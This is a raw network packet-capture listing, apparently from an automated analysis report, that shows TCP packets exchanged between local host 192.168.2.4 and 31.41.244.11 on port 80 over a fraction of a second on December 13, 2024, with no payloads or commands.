                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.788451910 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.789448977 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.789495945 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.789586067 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.789627075 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.790556908 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.790602922 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.790714979 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.790755987 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.791589975 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.791637897 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.791773081 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.791815042 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.792684078 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.792716980 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.792732954 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.792759895 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.793781042 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.793831110 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.793837070 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.793874979 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.794827938 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.794879913 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.794950962 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.794996023 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.795933008 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.795989037 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.796118975 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.796161890 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.797111034 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.797158003 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.797244072 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.797291040 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.798147917 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.798197985 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.798290968 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.798337936 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.799220085 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.799264908 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.799348116 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.799392939 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.800260067 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.800276041 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.800302029 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.800324917 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.801419973 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.801461935 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.801513910 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.801557064 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.802651882 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.802702904 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.802736044 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.802778959 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.803519011 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.803565025 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.803716898 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.803818941 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.804621935 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.804663897 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.804697990 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.804738998 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.805691957 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.805738926 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.805783033 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.805826902 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.806794882 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.806842089 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.806879997 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.806927919 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.807876110 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.807924032 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.808012009 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.808052063 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.808971882 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.809016943 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.809032917 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.809072971 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.810127020 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.810169935 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.810307980 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.810350895 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.811113119 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.811161995 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.811202049 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.811244965 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.812342882 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.812412977 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.812419891 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.812469006 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.813608885 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.813656092 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.813678026 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.813716888 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.814440012 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.814457893 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.814485073 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.814519882 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.815500975 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.815555096 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.815797091 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.815855026 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.816699982 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.816746950 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.816848993 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.816893101 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.817703009 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.817744970 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.817809105 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.817852974 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.818743944 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.818793058 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.818833113 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.818871975 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.819868088 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.819920063 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.819952965 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.819996119 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.820988894 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.821005106 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.821036100 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.821058035 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.822002888 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.822052002 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.822165966 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.822205067 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.823076010 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.823120117 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.823259115 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.823299885 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.824193001 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.824256897 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.824419022 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.824465036 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.825428009 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.825479031 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.825551033 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.825591087 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.826519012 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.826565027 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.826622963 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.826664925 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.827557087 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.827600002 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.827744007 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.827786922 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.828773022 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.828824043 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.828830004 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.828870058 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.829732895 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.829777002 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.830056906 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.830100060 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.830822945 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.830868006 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.966473103 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.966551065 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.966614962 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.966664076 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.966906071 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.966950893 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.967036963 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.967087984 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.967885971 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.967932940 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.967961073 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.968005896 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.969074965 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.969120979 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.969197035 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.969249010 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.970010042 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.970046997 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.970057964 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.970094919 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.971141100 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.971199989 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.971244097 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.971307039 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.971873045 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.971930981 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.972008944 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.972063065 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.972979069 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.973035097 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.973038912 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.973079920 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.974138975 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.974208117 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.974265099 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.974317074 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.975248098 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.975301027 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.975368977 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.975414991 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.976253033 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.976310968 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.976419926 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.976470947 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.977292061 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.977336884 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.977475882 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.977519035 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.978486061 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.978528976 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.978570938 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.978614092 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.979496956 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.979542017 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.979649067 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.979701996 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.980715036 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.980727911 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.980804920 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.981679916 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.981730938 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.981734991 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.981781960 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.982815027 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.982863903 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.982894897 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.982934952 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.983851910 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.983900070 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.983942032 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.984210014 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.984914064 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.984957933 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.984994888 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.985044003 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.985985041 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.986032963 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.986155987 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.986198902 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.987337112 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.987390995 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.987432957 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.987490892 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.988275051 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.988291979 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.988313913 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.988341093 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.989252090 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.989305019 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.989315033 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.989367008 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.990325928 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.990397930 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.990464926 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.990508080 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.991497993 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.991545916 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.991561890 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.991605997 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.992515087 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.992561102 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.992611885 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.992657900 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.993659973 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.993709087 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.993714094 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.993756056 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.994771004 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.994817972 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.994862080 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.994906902 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.995800972 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.995855093 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.995979071 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.996026039 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.996887922 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.996947050 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.996990919 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.997039080 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.997980118 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.998029947 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.998073101 CET804976331.41.244.11192.168.2.4
